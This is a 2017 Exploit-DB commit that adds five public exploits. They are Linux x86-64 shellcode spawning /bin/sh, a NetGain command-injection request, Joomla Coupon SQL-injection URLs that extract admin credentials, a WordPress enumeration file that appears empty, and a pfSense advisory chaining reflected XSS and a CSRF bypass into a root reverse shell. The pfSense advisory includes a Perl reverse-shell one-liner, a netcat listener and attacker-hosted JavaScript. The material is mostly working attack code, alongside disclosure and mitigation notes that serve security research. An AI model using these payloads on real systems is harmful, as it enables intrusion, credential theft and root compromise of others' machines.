From d3106003d4d214743e2ad7a9bb81933ba6c18393 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 4 Mar 2017 05:01:19 +0000 Subject: [PATCH] DB: 2017-03-04 5 new exploits Linux/x86-64 - Polymorphic Setuid(0) & Execve(/bin/sh) Shellcode (31 bytes) Wordpress < 4.7.1 - Username Enumeration NetGain Enterprise Manager 7.2.562 - 'Ping' Command Injection Joomla! Component Coupon 3.5 - SQL Injection pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery --- files.csv | 5 + platforms/jsp/webapps/41499.txt | 43 ++++ platforms/lin_x86-64/shellcode/41498.nasm | 50 ++++ platforms/php/webapps/41497.php | 26 ++ platforms/php/webapps/41500.txt | 27 ++ platforms/php/webapps/41501.txt | 295 ++++++++++++++++++++++ 6 files changed, 446 insertions(+) create mode 100755 platforms/jsp/webapps/41499.txt create mode 100755 platforms/lin_x86-64/shellcode/41498.nasm create mode 100755 platforms/php/webapps/41497.php create mode 100755 platforms/php/webapps/41500.txt create mode 100755 platforms/php/webapps/41501.txt diff --git a/files.csv b/files.csv index 69e27d9b3..0a2707ea9 100644 --- a/files.csv +++ b/files.csv @@ -15927,6 +15927,7 @@ id,file,description,date,author,platform,type,port 41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86_64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0 41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0 41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0 +41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - Polymorphic Setuid(0) & Execve(/bin/sh) Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 @@ -37411,3 +37412,7 @@ id,file,description,date,author,platform,type,port 41494,platforms/php/webapps/41494.txt,"Joomla! Component StreetGuessr Game 1.0 - SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0 41495,platforms/php/webapps/41495.txt,"Joomla! Component Guesser 1.0.4 - 'type' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0 41496,platforms/php/webapps/41496.txt,"Joomla! Component Recipe Manager 2.2 - 'id' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0 +41497,platforms/php/webapps/41497.php,"Wordpress < 4.7.1 - Username Enumeration",2017-03-03,Dctor,php,webapps,0 +41499,platforms/jsp/webapps/41499.txt,"NetGain Enterprise Manager 7.2.562 - 'Ping' Command Injection",2017-02-23,MrChaZ,jsp,webapps,0 +41500,platforms/php/webapps/41500.txt,"Joomla! Component Coupon 3.5 - SQL Injection",2017-03-03,"Ihsan Sencan",php,webapps,0 +41501,platforms/php/webapps/41501.txt,"pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery",2017-03-03,"Yann CAM",php,webapps,0 diff --git a/platforms/jsp/webapps/41499.txt b/platforms/jsp/webapps/41499.txt new file mode 100755 index 000000000..33dff54ee --- /dev/null +++ b/platforms/jsp/webapps/41499.txt @@ -0,0 +1,43 @@ +# Exploit Title: NetGain Enterprise Manager – “Ping” Command Injection +# Date: 23.02.2017 +# Exploit Author: MrChaZ +# Vendor Homepage: http://www.netgain-systems.com/ +# Version: <= v7.2.562 build 853 +# Tested on: Windows 10 Pro 64-bit (10,0 Build 14393 + + +Description: +=========================================================================== +Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. + +https://www.owasp.org/index.php/Command_Injection + +Vulnerable Menu: +=========================================================================== +[+] Tools – Ping + +Proof of Concept: +=========================================================================== +POST /u/jsp/tools/exec.jsp HTTP/1.1 +Host: 192.168.0.13:8081 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:18.0) Gecko/20100101 Firefox/18.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: http://192.168.0.13:8081/u/index.jsp +Content-Length: 97 +Cookie: JSESSIONID=542B58462355E4E3B99FAA42842E62FF +Connection: close +Pragma: no-cache +Cache-Control: no-cache + +command=cmd+%2Fc+ping&argument=127.0.0.1+%7C+whoami&async_output=ping1487856455258&isWindows=true +- +HTTP/1.1 200 OK +Server: Apache-Coyote/1.1 +Content-Type: text/html;charset=utf-8 +Content-Length: 70 +Date: Thu, 23 Feb 2017 13:27:40 GMT +Connection: close diff --git a/platforms/lin_x86-64/shellcode/41498.nasm b/platforms/lin_x86-64/shellcode/41498.nasm new file mode 100755 index 000000000..23df89515 --- /dev/null +++ b/platforms/lin_x86-64/shellcode/41498.nasm @@ -0,0 +1,50 @@ +;The MIT License (MIT) + +;Copyright (c) 2017 Robert L. Taylor + +;Permission is hereby granted, free of charge, to any person obtaining a +;copy of this software and associated documentation files (the “Software”), +;to deal in the Software without restriction, including without limitation +;the rights to use, copy, modify, merge, publish, distribute, sublicense, +;and/or sell copies of the Software, and to permit persons to whom the +;Software is furnished to do so, subject to the following conditions: + +;The above copyright notice and this permission notice shall be included +;in all copies or substantial portions of the Software. + +;The Software is provided “as is”, without warranty of any kind, express or +;implied, including but not limited to the warranties of merchantability, +;fitness for a particular purpose and noninfringement. In no event shall the +;authors or copyright holders be liable for any claim, damages or other +;liability, whether in an action of contract, tort or otherwise, arising +;from, out of or in connection with the software or the use or other +;dealings in the Software. +; +; For a detailed explanation of this shellcode see my blog post: +; http://a41l4.blogspot.ca/2017/03/polysetuidexecve1434.html + +global _start + +section .text + +_start: +; setuid(0) + xor edi,edi + push rdi ; null terminator for the following string + push 105 + pop rax + ; push /bin//sh in reverse + mov rbx,0xd0e65e5edcd2c45e + syscall + +; execve + ror rbx,1 + mov al,59 + push rbx + xchg esi,edi + push rsp + cdq + ; store /bin//sh address in RDI, points at string + pop rdi + ; Call the Execve syscall + syscall \ No newline at end of file diff --git a/platforms/php/webapps/41497.php b/platforms/php/webapps/41497.php new file mode 100755 index 000000000..a740d9cb1 --- /dev/null +++ b/platforms/php/webapps/41497.php @@ -0,0 +1,26 @@ +#!usr/bin/php + \ No newline at end of file diff --git a/platforms/php/webapps/41500.txt b/platforms/php/webapps/41500.txt new file mode 100755 index 000000000..f7304cd78 --- /dev/null +++ b/platforms/php/webapps/41500.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Joomla! Component Coupon v3.5 - SQL Injection +# Google Dork: inurl:index.php?option=com_coupon +# Date: 03.03.2017 +# Vendor Homepage: http://joomla6teen.com/ +# Software: https://extensions.joomla.org/extensions/extension/e-commerce/gifts-a-coupons/coupon/ +# Demo: http://demo.joomla6teen.com/couponmanager/ +# Version: 3.5 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_coupon&view=coupons&task=mail_box&=[SQL] +# http://localhost/[PATH]/index.php?option=com_coupon&view=coupons&catid=[SQL] +# http://localhost/[PATH]/index.php?option=com_coupon&view=coupons&storeid=[SQL] +# For example; +# DATABASE > demojoom_coupon3 +# TABLES > wl6xp_users +# COLUMNS > username, password +# DATA +# http://localhost/[PATH]/index.php?option=com_coupon&view=coupons&catid=7+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username,char(58),password)+AS+CHAR),0x7e))+FROM+wl6xp_users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) +# admin:$2y$10$IeBQiHyJNpZ7mVVNlmW7..Xr5I4tSTlN5Dq7QVltnjtWmaWu2J4 +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41501.txt b/platforms/php/webapps/41501.txt new file mode 100755 index 000000000..84576bb72 --- /dev/null +++ b/platforms/php/webapps/41501.txt @@ -0,0 +1,295 @@ +###################################################################### +# Exploit Title: pfSense 2.3.2 XSS - CSRF-bypass & Reverse-root-shell +# Date: 01/03/2017 +# Author: Yann CAM @ASafety / Synetis +# Vendor or Software Link: www.pfsense.org +# Version: 2.3.2 +# Category: XSS, CSRF-bypass and Remote root reverse-shell Access +# Google dork: +# Tested on: FreeBSD +###################################################################### + + +pfSense firewall/router distribution description : +====================================================================== + +pfSense is a free, open source customized distribution of FreeBSD tailored for use as a firewall and router. In addition +to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package +system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. +pfSense is a popular project with more than 1 million downloads since its inception, and proven in countless installations +ranging from small home networks protecting a PC and an Xbox to large corporations, universities and other organizations +protecting thousands of network devices. + +This project started in 2004 as a fork of the m0n0wall project, but focused towards full PC installations rather than the +embedded hardware focus of m0n0wall. pfSense also offers an embedded image for Compact Flash based installations, however +it is not our primary focus. + +In version 2.3.2 of the distribution, differents XSS vulnerabilities allow CSRF security mechanisms bypass and RCE reverse +root shell can be triggered. It is strongly advised to update to version 2.3.2 available now. + +Demonstration video : https://www.youtube.com/watch?v=IWtf6LlfP_c&t=4s + + +Proof of Concept 1 - Reflected Cross-Site Scripting : +====================================================================== + +There are several RXSS in GET parameter available on the pfSense WebGui, example : + +File status_captiveportal_expire.php lines 69-73 : + $cpzone = $_GET['zone']; + if (isset($_POST['zone'])) { + $cpzone = $_POST['zone']; + } + $cpzone = strtolower($cpzone); + +then reflection lines 100-104 : + + $tab_array[] = array(gettext("Active Users"), false, "status_captiveportal.php?zone={$cpzone}"); + $tab_array[] = array(gettext("Active Vouchers"), false, "status_captiveportal_vouchers.php?zone={$cpzone}"); + $tab_array[] = array(gettext("Voucher Rolls"), false, "status_captiveportal_voucher_rolls.php?zone={$cpzone}"); + $tab_array[] = array(gettext("Test Vouchers"), false, "status_captiveportal_test.php?zone={$cpzone}"); + $tab_array[] = array(gettext("Expire Vouchers"), true, "status_captiveportal_expire.php?zone={$cpzone}"); + +List of parameters vulnerable to reflected XSS: + +* status_captiveportal.php: "order", "zone" +* status_captiveportal_expire.php: "zone" +* status_captiveportal_test.php: "zone" +* status_captiveportal_voucher_rolls.php: "zone" +* status_captiveportal_vouchers.php: "zone" + +Result with a direct call to this page (authenticated session) : + + http:///status_captiveportal_expire.php?zone="> + +These RXSS are through GET parameters, so they are triggered directly on page loading (doesn't need any CSRF token). +CSRF token security mechanism protect only RXSS through POST parameters in the pfSense context. + +Proof of Concept 2 - Bypass all CSRF protection via R-XSS : +====================================================================== + +Via the R-XSS in GET parameter identified previously, it's possible for an attacker to bypass all CSRFMagic mechanisms +in the pfSense WebGUI. + +Through this XSS in GET param, an attacker can benefit of the current pfSense context in a victim's browser already +logged as administrator in pfSense web administration interface. +Via this XSS, the attacker can forge his own and hidden request in the victim browser, with : + +* Right referer for bypassing anti-CSRF mechanisms +* Request page to get a valid CSRF token to forge final form submissions with admin rights + +The next piece of JavaScript-JQuery can make any CSRF with right referer and security token retrieved in pfSense context : + + // Function with JQuery AJAX request + // This function requests an internal WebGUI page, which contains the token. + // Source code of this webpage is passed to the extractToken() function. + function loadToken(){ + $.ajax({ + type: 'POST', + url: '/diag_command.php', + contentType: 'application/x-www-form-urlencoded;charset=utf-8', + dataType: 'text', + data: '', + success:extractToken + }); // after this request, we called the extractToken() function to extract the token + } + + // Function called after AJAX request in a defined page of the context, which contains the token value + function extractToken(response){ + // response var contain the source code of the page requested by AJAX + // Regex to catch the token value + var regex = new RegExp("",'gi'); + var token = response.match(regex); + token = RegExp.$1; + // Pass the token to the final function which make the CSRF final attack + //alert(token); + makeCSRF(token); + } + +If this script is loaded from the previous XSS, all web-forms in the pfSense WebGui can be submitted as a legitimate +and authenticated user (like administrator). + + +Proof of Concept 3 : R-XSS to CSRF to Remote Reverse root Shell +====================================================================== + +pfSense distribution provides some internal tools / commands like "perl". + +Example of one-liner Perl reverse-root-shell in command line : + + [2.3.2-RELEASE][admin@pfSense.localdomain]/usr/local/www: perl -e 'use Socket;$i="[ATTACKER_IP]";$p=[ATTACKER_PORT];socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STen(STDERR,">&S");exec("/bin/sh -i");};' + +Plus, through the WebGui as administrator, it's possible to execute system command (shell) directly in the web browser as root user : + + http:///diag_command.php + +POST parameter for command execution to this page are (via PHP script) : + + txtCommand=&txtRecallBuffer=&dlPath=&ulfile=&txtPHPCommand=[PAYLOAD]&submit=EXECPHP&__csrf_magic=[CSRFTOKEN] + +So, by chaining the R-XSS, bypass any anti-CSRF protection and with some AJAX calls with right referer / right CSRF token, +an attacker can gain a full reverse-shell as root on the pfSense : + +1/ Step one : the attacker puts a netcat in listen mode on port 4444 on his computer + + $ nc -l -vv -p 4444 + +2/ Step two : the attacker puts the next x.js JavaScript file on his webserver http://attacker.com/x.js : + + var hash = window.location.hash.substring(1); + var lhost = hash.substring(hash.indexOf("lhost=")+6, hash.indexOf("&")); + var lport = hash.substring(hash.indexOf("lport=")+6, hash.length); + + var payload='system%28%27%2fusr%2flocal%2fbin%2fperl%20-e%20%5C%27use%20Socket%3B%24i%3D%22' + lhost + '%22%3B%24p%3D' + lport + '%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2fbin%2fsh%20-i%22%29%3B%7D%3B%5C%27%27%29%3B'; + + // Function with JQuery AJAX request + // This function requests an internal WebGUI page, which contains the token. + // Source code of this webpage is passed to the extractToken() function. + function loadToken(){ + $.ajax({ + type: 'POST', + url: '/diag_command.php', + contentType: 'application/x-www-form-urlencoded;charset=utf-8', + dataType: 'text', + data: '', + success:extractToken + }); // after this request, we called the extractToken() function to extract the token + } + + // Function called after AJAX request in a defined page of the context, which contains the token value + function extractToken(response){ + // response var contain the source code of the page requested by AJAX + // Regex to catch the token value + var regex = new RegExp("",'gi'); + var token = response.match(regex); + token = RegExp.$1; + // Pass the token to the final function which make the CSRF final attack + //alert(token); + makeCSRF(token); + } + + // This function use JQuery AJAX object. + // The token var is needed to perform the right CSRF attack with the context referer + function makeCSRF(token){ + // Final CSRF attack with right referer (because executed in the context) + // and with right token captured above + $.ajax({ + type: 'POST', + url: '/diag_command.php', + contentType: 'application/x-www-form-urlencoded;charset=utf-8', + dataType: 'text', + data: 'txtCommand=&txtRecallBuffer=&dlPath=&ulfile=&txtPHPCommand=' + payload + '&submit=EXECPHP&__csrf_magic=' + token + }); // payload of your choice + } + + if (trigger){ + } else { + var trigger = function(){ + // Load JQuery dynamically in the targeted context + var headx = document.getElementsByTagName('head')[0]; + var jq = document.createElement('script'); + jq.type = 'text/javascript'; + jq.src = 'http://code.jquery.com/jquery-latest.min.js'; + headx.appendChild(jq); + // Waiting 2 secondes for correct loading of JQuery added dynamically. + // Then, run the first AJAX request in the WebGUI context to retrieve the token + setTimeout('loadToken()', 2000); + }; + trigger(); + } + +3/ Step three : the attacker generates the RXSS / anti-CSRF / RCE-root final URL : + + http:///status_captiveportal_expire.php?zone=">#lhost=[ATTACKER_IP]&lport=[ATTACKER_PORT] + +4/ Finaly, the attacker sends this URL (hidden via bitly.com for example) to a pfSense sysadmin and wait for the reverse root shell. + +Tested and validated with Firefox latest version 50.1.0. + +I have created some BeEF modules to exploit the same vulnerability / scenario. + +This full PoC can be seen in the demonstration video here : https://www.youtube.com/watch?v=IWtf6LlfP_c&t=4s + +pfSense 2.3.2 contains several security mechanisms and security best-practices like: + +- X-Frame-Option header +- POST form-submission token anti-CSRF +- Referer checking to protect against CSRF + +But just with a simple RXSS in GET, all these security best-practices can be bypassed to gain a full reverse root shell remotely. + + +Mitigation: +====================================================================== + +I suggest to double-check all $_GET/$_POST params directly reflected in the pfSense PHP source code without sanitization. +Plus, some HTTP headers can be added in pfSense for a better security, like: + +- X-XSS-Protectoin +- X-Content-Type-Options +- CSP header +- Etc. + + +Solution: +====================================================================== +2017-02-20: Release 2.3.3 + + +Additional resources : +====================================================================== + +- www.pfsense.org +- www.synetis.com +- blog.pfsense.org/?p=2325 +- www.asafety.fr +- www.youtube.com/watch?v=IWtf6LlfP_c&t=4s +- doc.pfsense.org/index.php/2.3.3_New_Features_and_Changes +- pfsense.org/security/advisories/pfSense-SA-17_01.webgui.asc +- github.com/pfsense/pfsense/pull/3288 +- github.com/pfsense/pfsense/pull/3288/commits/9ec212fb11e4b2825acda68279c7e9553186c06d +- github.com/pfsense/pfsense/pull/3288/commits/992dd571bcad6508ccea0f478491183d7c7e3c4c +- github.com/beefproject/beef/commit/2f632bcbcd0a73ff2d300110bfdec81986e88285 + + +Report timeline : +====================================================================== + +2016-12-17 : Vulnerability found +2016-12-18 : pfSense team alerted with details, PoC, mitigation proposal through github pull request +2016-12-18 : pfSense team feedback via github +2017-02-20 : pfSense 2.3.3 release with fix +2017-02-22 : BeEF module pull request +2017-03-01 : Public advisory + + + +Credits : +====================================================================== + + 88888888 + 88 888 88 88 + 888 88 88 + 788 Z88 88 88.888888 8888888 888888 88 8888888. + 888888. 88 88 888 Z88 88 88 88 88 88 88 + 8888888 88 88 88 88 88 88 88 88 888 + 888 88 88 88 88 88888888888 88 88 888888 + 88 88 88 8. 88 88 88 88 88 888 + 888 ,88 8I88 88 88 88 88 88 88 .88 .88 + ?8888888888. 888 88 88 88888888 8888 88 =88888888 + 888. 88 + 88 www.synetis.com + 8888 Consulting firm in management and information security + +Yann CAM - Security Researcher @ASafety / Security Consultant @Synetis + + + +Last word : +====================================================================== + +Thank you to all the pfSense team for professionalism and quality solution despite of these few weaknesses. + +-- +SYNETIS +CONTACT: www.synetis.com \ No newline at end of file